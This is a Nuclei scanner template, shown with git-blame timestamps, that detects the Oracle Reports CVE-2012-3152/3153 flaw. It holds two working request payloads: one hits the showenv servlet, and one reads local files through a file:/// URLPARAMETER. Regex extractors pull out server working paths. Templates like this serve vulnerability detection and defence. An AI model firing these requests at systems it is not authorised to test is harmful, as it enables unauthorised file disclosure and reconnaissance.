2021-06-22 13:52:51 +00:00
|
|
|
id: CVE-2012-3153
|
2021-06-21 08:48:42 +00:00
|
|
|
|
|
|
|
info:
|
2021-06-22 13:52:51 +00:00
|
|
|
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
|
2021-06-21 08:48:42 +00:00
|
|
|
author: Sid Ahmed MALAOUI @ Realistic Security
|
2023-07-11 19:49:27 +00:00
|
|
|
severity: medium
|
2021-06-21 08:48:42 +00:00
|
|
|
description: |
|
2022-02-21 22:45:04 +00:00
|
|
|
An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
|
2021-06-22 13:52:51 +00:00
|
|
|
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
|
2021-06-21 08:48:42 +00:00
|
|
|
vectors related to Report Server Component.
|
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
|
|
|
|
- https://www.exploit-db.com/exploits/31737
|
2022-02-21 22:45:04 +00:00
|
|
|
- https://www.oracle.com/security-alerts/cpuoct2012.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
|
2022-02-21 22:45:04 +00:00
|
|
|
classification:
|
2022-09-06 01:33:31 +00:00
|
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
|
2023-04-18 02:40:53 +00:00
|
|
|
cvss-score: 6.4
|
2022-02-21 22:45:04 +00:00
|
|
|
cve-id: CVE-2012-3153
|
2022-09-06 01:33:31 +00:00
|
|
|
cwe-id: NVD-CWE-noinfo
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.97048
|
|
|
|
cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-percentile: 0.99647
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: oracle
|
|
|
|
product: fusion_middleware
|
|
|
|
tags: cve,cve2012,oracle,rce,edb
|
2021-06-21 08:48:42 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-06-21 08:48:42 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-06-22 13:52:51 +00:00
|
|
|
- "{{BaseURL}}/reports/rwservlet/showenv"
|
2021-06-21 08:48:42 +00:00
|
|
|
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
|
2021-06-23 18:18:34 +00:00
|
|
|
|
2021-06-22 13:52:51 +00:00
|
|
|
req-condition: true
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-06-22 13:52:51 +00:00
|
|
|
matchers-condition: and
|
2021-06-21 08:48:42 +00:00
|
|
|
matchers:
|
2021-06-22 13:52:51 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
2021-07-03 19:35:05 +00:00
|
|
|
- 'contains(body_1, "Reports Servlet")'
|
2021-06-23 18:18:34 +00:00
|
|
|
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
2021-06-29 07:11:19 +00:00
|
|
|
- '!contains(body_2, "<html")'
|
|
|
|
- '!contains(body_2, "<HTML")'
|
2021-06-23 18:18:34 +00:00
|
|
|
condition: and
|
|
|
|
|
2023-07-11 19:49:27 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
2021-06-22 13:52:51 +00:00
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
name: windows_working_path
|
|
|
|
regex:
|
|
|
|
- ".?.?\\\\.*\\\\showenv"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-06-22 13:52:51 +00:00
|
|
|
- type: regex
|
|
|
|
name: linux_working_path
|
|
|
|
regex:
|
|
|
|
- "/.*/showenv"
|